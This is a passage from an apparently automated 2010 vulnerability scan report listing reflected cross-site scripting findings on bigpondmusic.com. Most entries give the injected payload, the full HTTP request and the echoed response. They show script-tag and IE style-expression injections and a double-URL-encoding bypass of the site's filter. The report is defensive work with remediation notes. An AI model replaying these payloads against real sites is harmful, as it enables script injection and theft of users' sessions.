<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under112a0f0"><script>alert(1)</script>6d2018e8d34" />
...[SNIP]...

2.170. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4a97'%3b192cd7debc4 was submitted in the REST URL parameter 2. This input was echoed as f4a97';192cd7debc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under11f4a97'%3b192cd7debc4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under11f4a97';192cd7debc4';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.171. http://bigpondmusic.com/bargains/under11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85cfd"style="x:expression(alert(1))"bf04d3f3adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under11?85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 231489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $11 and under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under11?85cfd"style="x:expression(alert(1))"bf04d3f3adc=1" />
...[SNIP]...

2.172. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e was submitted in the REST URL parameter 1. This input was echoed as 885a4"><script>alert(1)</script>316cb794c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains885a4"><script>alert(1)</script>316cb794c1e/under13" />
...[SNIP]...

2.173. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32294'%3bec059bf4529 was submitted in the REST URL parameter 1. This input was echoed as 32294';ec059bf4529 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains32294'%3bec059bf4529/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains32294';ec059bf4529';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.174. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 was submitted in the REST URL parameter 2. This input was echoed as c2220"><script>alert(1)</script>5e45c0b35f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13c2220"><script>alert(1)</script>5e45c0b35f9" />
...[SNIP]...

2.175. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d00'%3b5edcbbcdac6 was submitted in the REST URL parameter 2. This input was echoed as 51d00';5edcbbcdac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1351d00'%3b5edcbbcdac6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1351d00';5edcbbcdac6';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.176. http://bigpondmusic.com/bargains/under13 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 874f6"style="x:expression(alert(1))"4e4f0e24928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13?874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229873


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13?874f6"style="x:expression(alert(1))"4e4f0e24928=1" />
...[SNIP]...

2.177. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9c2'%3bab1ce357a08 was submitted in the REST URL parameter 1. This input was echoed as ce9c2';ab1ce357a08 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainsce9c2'%3bab1ce357a08/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainsce9c2';ab1ce357a08';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.178. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd was submitted in the REST URL parameter 1. This input was echoed as 107c8"><script>alert(1)</script>43f02f38efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains107c8"><script>alert(1)</script>43f02f38efd/under13/" />
...[SNIP]...

2.179. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b64'%3b7b1bcc8a715 was submitted in the REST URL parameter 2. This input was echoed as 38b64';7b1bcc8a715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1338b64'%3b7b1bcc8a715/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88037


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1338b64';7b1bcc8a715';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.180. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9 was submitted in the REST URL parameter 2. This input was echoed as b1ade"><script>alert(1)</script>44d7c5038c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13b1ade"><script>alert(1)</script>44d7c5038c9/" />
...[SNIP]...

2.181. http://bigpondmusic.com/bargains/under13/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b12d9"style="x:expression(alert(1))"52b563ab311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?b12d9"style="x:expression(alert(1))"52b563ab311=1" />
...[SNIP]...

2.182. http://bigpondmusic.com/bargains/under13/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a14"style%3d"x%3aexpression(alert(1))"fe980943757 was submitted in the ref parameter. This input was echoed as 29a14"style="x:expression(alert(1))"fe980943757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?ref=Net-Head-Music-Bargains29a14"style%3d"x%3aexpression(alert(1))"fe980943757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
